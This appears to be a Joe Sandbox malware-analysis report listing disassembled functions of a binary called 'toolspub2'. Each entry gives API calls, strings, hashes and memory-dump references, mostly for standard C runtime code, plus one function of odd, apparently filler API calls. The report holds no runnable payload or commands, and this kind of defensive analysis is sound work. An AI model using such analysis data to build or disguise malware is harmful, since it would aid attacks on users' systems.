Opcode ID: ef3dbb146f5969fb64acee3857677eec3959f544dd1873165fc4536494f17991
Instruction ID: 44d8534853f393bc9b69529474bd00465de58c7f882759ba68c467c4d7ed23e2
Opcode Fuzzy Hash: ef3dbb146f5969fb64acee3857677eec3959f544dd1873165fc4536494f17991
Instruction Fuzzy Hash: CA316F31D10210EBC721AFB5AD4965A3AE1FB88762710523BEA14F26F0DB79A441CF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00429720 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

SetCommState.KERNEL32(00000000,00000000), ref: 00429737
RemoveDirectoryA.KERNEL32(00000000), ref: 0042973F
SetSystemPowerState.KERNEL32(00000000,00000000), ref: 00429749
GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 00429759
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0042976A
GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 00429777
CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042978B
FoldStringA.KERNEL32(00000000,wafurubipagogizojeca yelirahipotuluxi mutezucit,00000000,?,00000000), ref: 004297A1
ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004297B3

Strings

wafurubipagogizojeca yelirahipotuluxi mutezucit, xrefs: 0042979A

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: File$DirectoryState$CommCompressedConsoleCreateFoldInputPowerRemoveReplaceSizeStringSystemWindowsWrite
String ID: wafurubipagogizojeca yelirahipotuluxi mutezucit
API String ID: 1778575968-1505459847
Opcode ID: 912685c5b356c61fed35d2224baf74f417aee7819b64a6c7e5cead4b159f859a
Instruction ID: 095224edc76ccae2854af88811de5b53715052bc8486373523782acf4feea8b6
Opcode Fuzzy Hash: 912685c5b356c61fed35d2224baf74f417aee7819b64a6c7e5cead4b159f859a
Instruction Fuzzy Hash: 5D114435248341EFF354AF90DD4AFA937B4AB4CB02F504529F745AA2E0D6B45440CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00405A70 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00405ABB

Part of subcall function 00408B31: RaiseException.KERNEL32(00000004,?,?,004041F4), ref: 00408B73

std::exception::exception.LIBCMT ref: 00405A9C

Part of subcall function 00407D4C: std::exception::_Copy_str.LIBCMT ref: 00407D67

std::exception::exception.LIBCMT ref: 00405ADC
__CxxThrowException@8.LIBCMT ref: 00405AFB
std::exception::exception.LIBCMT ref: 00405B18
__CxxThrowException@8.LIBCMT ref: 00405B37

Strings

ios_base::eofbit set, xrefs: 00405B10
ios_base::badbit set, xrefs: 00405A94
PZ@, xrefs: 00405AB3, 00405AF3, 00405B2F
ios_base::failbit set, xrefs: 00405AD4

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
String ID: PZ@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1430062303-1864213188
Opcode ID: 2d755e540355c7d7f9ea4764411c0329434322430d7e1a329f173d656397f190
Instruction ID: fadb92b1054d3d4508b2874e9053bbdacf34fe293ecdbc7888de4e06e1023810
Opcode Fuzzy Hash: 2d755e540355c7d7f9ea4764411c0329434322430d7e1a329f173d656397f190
Instruction Fuzzy Hash: 7D1160B14083019BC304EF59C54154FBBF8AED8748F10492FB185B7291DBB4A508CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA3 Relevance: 15.2, APIs: 10, Instructions: 189COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00409F12
_malloc.LIBCMT ref: 00409F51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00409F80
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00409F9C
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00409FD5
_malloc.LIBCMT ref: 0040A00E

Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC

LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 0040A03B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040A05A
__freea.LIBCMT ref: 0040A064
__freea.LIBCMT ref: 0040A06D

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ByteCharMultiStringWide$__freea_malloc$AllocateHeap
String ID:
API String ID: 2350834463-0
Opcode ID: d61e90fc5190e7e20fd9e1a27e259b527235d12957ac79bb67152e93b52fda89
Instruction ID: 7acae93386c8d0666369f6d5593fe410aebdb1f02d1067f632a3b2be1d791924
Opcode Fuzzy Hash: d61e90fc5190e7e20fd9e1a27e259b527235d12957ac79bb67152e93b52fda89
Instruction Fuzzy Hash: 6051BF7290020EAFCF119FA4CC818AE7BB6FB48358F18413AF515F22A1D7398C61DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00406A30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00406A50
std::_Lockit::_Lockit.LIBCPMT ref: 00406A76
__CxxThrowException@8.LIBCMT ref: 00406B09
std::_Lockit::_Lockit.LIBCPMT ref: 00406B1E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00406B39

Strings

bad cast, xrefs: 00406AF1

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::locale::facet::_
String ID: bad cast
API String ID: 2895652726-3145022300
Opcode ID: 1dd3f9784271673de89be40fea72fe8d047e25f0b85be130dc9353411ab2391b
Instruction ID: d383be67998852100b4c36a8a5fca670dd3f7b803c7398b72b44daa99cff2c7e
Opcode Fuzzy Hash: 1dd3f9784271673de89be40fea72fe8d047e25f0b85be130dc9353411ab2391b
Instruction Fuzzy Hash: E1310171A043119BC714EF14C881B5ABBA0FB44724F218A3EE497B72D1DB38BD44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409015 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 0040901C

Part of subcall function 0040C187: GetLastError.KERNEL32(?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C18B
Part of subcall function 0040C187: ___set_flsgetvalue.LIBCMT ref: 0040C199
Part of subcall function 0040C187: __calloc_crt.LIBCMT ref: 0040C1AD
Part of subcall function 0040C187: DecodePointer.KERNEL32(00000000,?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C1C7
Part of subcall function 0040C187: __initptd.LIBCMT ref: 0040C1D6
Part of subcall function 0040C187: GetCurrentThreadId.KERNEL32 ref: 0040C1DD
Part of subcall function 0040C187: SetLastError.KERNEL32(00000000,?,?,0040A8F4,00407F83,?,?,00407D41,?), ref: 0040C1F5

__calloc_crt.LIBCMT ref: 0040903E
__get_sys_err_msg.LIBCMT ref: 0040905C
_strcpy_s.LIBCMT ref: 00409064
__invoke_watson.LIBCMT ref: 00409079

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00409029, 0040904C

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 69636372-798102604
Opcode ID: d860c3ecbfeb18338d48f3cebc6bb86569337b8885aa831edaa1a818a86fb787
Instruction ID: 0b2e0f78feb1162477e54297166a760c5e285535bf36ad1fafac8514ac5e128f
Opcode Fuzzy Hash: d860c3ecbfeb18338d48f3cebc6bb86569337b8885aa831edaa1a818a86fb787
Instruction Fuzzy Hash: 4DF024B26042106BCB30392B4C81D6BB29DCB91768B11453FF60AB72D3EA3E8C41829D

Uniqueness

Uniqueness Score: -1.00%

Function 004055B0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004055D3
std::exception::exception.LIBCMT ref: 0040560E

Part of subcall function 00407D4C: std::exception::_Copy_str.LIBCMT ref: 00407D67

__CxxThrowException@8.LIBCMT ref: 00405625

Part of subcall function 00408B31: RaiseException.KERNEL32(00000004,?,?,004041F4), ref: 00408B73

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040562C

Strings

PZ@, xrefs: 0040561D
bad locale name, xrefs: 00405606

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: PZ@$bad locale name
API String ID: 73090415-414459017
Opcode ID: 265d925210115b29a7932d0a3ef48d4c0e73aebc9e4c7f18131d7780433d9712
Instruction ID: 70fc0caea9c7c166b3bd10431bfc68367145f887a61b147fa1e0a6e8c1cf2896
Opcode Fuzzy Hash: 265d925210115b29a7932d0a3ef48d4c0e73aebc9e4c7f18131d7780433d9712
Instruction Fuzzy Hash: 2F1156B15487809FC311DF598481A5BFBE4BB68714F844A2FF1D963781C778A508CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004084E8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00408502

Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC

std::exception::exception.LIBCMT ref: 00408537
std::exception::exception.LIBCMT ref: 00408551
__CxxThrowException@8.LIBCMT ref: 00408562

Strings

L=C, xrefs: 00408515
bad allocation, xrefs: 00408530

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: L=C$bad allocation
API String ID: 615853336-1140591844
Opcode ID: 0dfe834c578b0d95ce2b3b748650df0acf3b29a1257c5051eaa95e1b4484a61b
Instruction ID: 3ae25ba80ab44ad477bf62c94f258e5f94ee485d823ca0a99b4dd2091dcfd21f
Opcode Fuzzy Hash: 0dfe834c578b0d95ce2b3b748650df0acf3b29a1257c5051eaa95e1b4484a61b
Instruction Fuzzy Hash: F2F0F930A0421A7ADB04EF15DD02A5E3B799F80718F20403FF400B61E2DFBCDA419A4E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDCC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040CDED

Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210

__getptd.LIBCMT ref: 0040CDFE
__getptd.LIBCMT ref: 0040CE0C

Strings

RCC, xrefs: 0040CDD8
MOC, xrefs: 0040CDDF
csm, xrefs: 0040CDE6

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 7949cde81220e32a5ab24ff03e5f8c69654839aa6cf9eb064e58a1c80bd53bbf
Instruction ID: 2c2391279a0edf5a1ecc72825b3f41cb85fd91b10ea7dca358035dda9bdca57f
Opcode Fuzzy Hash: 7949cde81220e32a5ab24ff03e5f8c69654839aa6cf9eb064e58a1c80bd53bbf
Instruction Fuzzy Hash: B5E0C934504104CFD71097A5C08A7693695AB84318F2506F7E41CABAB3C73CA860959A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D07E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0040D0A6

Part of subcall function 00408E5C: __getptd.LIBCMT ref: 00408E6A
Part of subcall function 00408E5C: __getptd.LIBCMT ref: 00408E78

__getptd.LIBCMT ref: 0040D0B0

Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210

__getptd.LIBCMT ref: 0040D0BE
__getptd.LIBCMT ref: 0040D0CC
__getptd.LIBCMT ref: 0040D0D7
_CallCatchBlock2.LIBCMT ref: 0040D0FD

Part of subcall function 00408F01: __CallSettingFrame@12.LIBCMT ref: 00408F4D

Part of subcall function 0040D1A4: __getptd.LIBCMT ref: 0040D1B3
Part of subcall function 0040D1A4: __getptd.LIBCMT ref: 0040D1C1

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e538ce5dd66796c02ea310f58a6a853e35e3a6571055be479ec245675d64c2e6
Instruction ID: 88f72708f33c26c08780041cd2be50bb14ce52e09a87619738af0235c69c1c31
Opcode Fuzzy Hash: e538ce5dd66796c02ea310f58a6a853e35e3a6571055be479ec245675d64c2e6
Instruction Fuzzy Hash: E911B7B1D00209DFDB00EFA5D545BAE77B0FF04314F20816EE864AB292DB7899159B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D42B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0040D43E

Part of subcall function 0040D399: ___BuildCatchObjectHelper.LIBCMT ref: 0040D3CF

_UnwindNestedFrames.LIBCMT ref: 0040D455
___FrameUnwindToState.LIBCMT ref: 0040D463

Strings

csm, xrefs: 0040D42D
csm, xrefs: 0040D43A, 0040D44F, 0040D462, 0040D480, 0040D490

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: eb6fac34a6ad23033f80fdbd32dd719b7d461b59595acb891ed0c7b3c82ac2b9
Instruction ID: 0ee9aba2f99e48f19686b3c1e9e846d58845e68f87dd79ce8f07be3f155cb553
Opcode Fuzzy Hash: eb6fac34a6ad23033f80fdbd32dd719b7d461b59595acb891ed0c7b3c82ac2b9
Instruction Fuzzy Hash: 22014F71801109BBCF126F91CC45EEB7F6AEF04344F00802AFD18251A1D779A971DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408709 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 0040870E
__NMSG_WRITE.LIBCMT ref: 0040871C
_raise.LIBCMT ref: 0040A751
__call_reportfault.LIBCMT ref: 0040A769

Strings

PN7w, xrefs: 0040870E

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: DecodePointer__call_reportfault_raise
String ID: PN7w
API String ID: 2042925533-3458938079
Opcode ID: e694b38d64a2a4e87c4582f6ba5621aa52b5d7db603c081b50c03ad274161617
Instruction ID: 3a2720c5c4e2553745fcca75dc565e4967b783802b6c8afcdff5ee4720be119e
Opcode Fuzzy Hash: e694b38d64a2a4e87c4582f6ba5621aa52b5d7db603c081b50c03ad274161617
Instruction Fuzzy Hash: 0DE09A6024030561FE2233B21D4BBAA21254F81B09F08803F7B04B90C2EEFE8620816F

Uniqueness

Uniqueness Score: -1.00%

Function 00407E41 Relevance: 7.7, APIs: 5, Instructions: 161COMMON

Download Yara Rule

APIs

___libm_error_support.LIBCMT ref: 00407EF5

Part of subcall function 0040A997: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00407EFA), ref: 0040A9B5

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: DecodePointer___libm_error_support
String ID:
API String ID: 3413902329-0
Opcode ID: 8fed55b8b16d5a488a6f659c673600c9e24e0e5e449c8a8e6e5f730b7deaa70f
Instruction ID: a486dd6b7469967ff0a4485c22fdeba358c651907e5a6c41b8ca034f995396dd
Opcode Fuzzy Hash: 8fed55b8b16d5a488a6f659c673600c9e24e0e5e449c8a8e6e5f730b7deaa70f
Instruction Fuzzy Hash: E5517B7180C709A6DF106B35D9061AE7BA4FF45350F10CABBF8C4A41D1EF3898A0D24B

Uniqueness

Uniqueness Score: -1.00%

Function 004083EA Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004083F8

Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC

_free.LIBCMT ref: 0040840B

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 75877a2e1822163ee47317495c0ea83b80484c0b66870d450e0c6244c0ed3f6c
Instruction ID: fc78b206c5da63e7dd5d13e161119ff5467202fc1196a695acbaaa219d7309df
Opcode Fuzzy Hash: 75877a2e1822163ee47317495c0ea83b80484c0b66870d450e0c6244c0ed3f6c
Instruction Fuzzy Hash: E411C832905612AACF213F35E904A5A37549F80365B20843FF998F62D1FE3C8851969E

Uniqueness

Uniqueness Score: -1.00%

Function 00405650 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00405674

Part of subcall function 00407266: _setlocale.LIBCMT ref: 00407278

_free.LIBCMT ref: 00405686

Part of subcall function 00407F5D: HeapFree.KERNEL32(00000000,00000000,?,00407D41,?), ref: 00407F73
Part of subcall function 00407F5D: GetLastError.KERNEL32(?,?,00407D41,?), ref: 00407F85

_free.LIBCMT ref: 00405699
_free.LIBCMT ref: 004056AC
_free.LIBCMT ref: 004056BF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 477d0e12d415ce0e27a8dff15be26880656b3ec1fd926705981000bb3c49d504
Instruction ID: 725eca7d885b881cc8c8b873ebff988813182e83e5bc14f13607900b40e6c06f
Opcode Fuzzy Hash: 477d0e12d415ce0e27a8dff15be26880656b3ec1fd926705981000bb3c49d504
Instruction Fuzzy Hash: D30170B1A04B409BC620DF19D841A07F7E9EB91B14F154A2FE05AE3680E739F9048A5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1D0 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040F1DC

Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210

__getptd.LIBCMT ref: 0040F1F3
__amsg_exit.LIBCMT ref: 0040F201
__lock.LIBCMT ref: 0040F211
__updatetlocinfoEx_nolock.LIBCMT ref: 0040F225

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
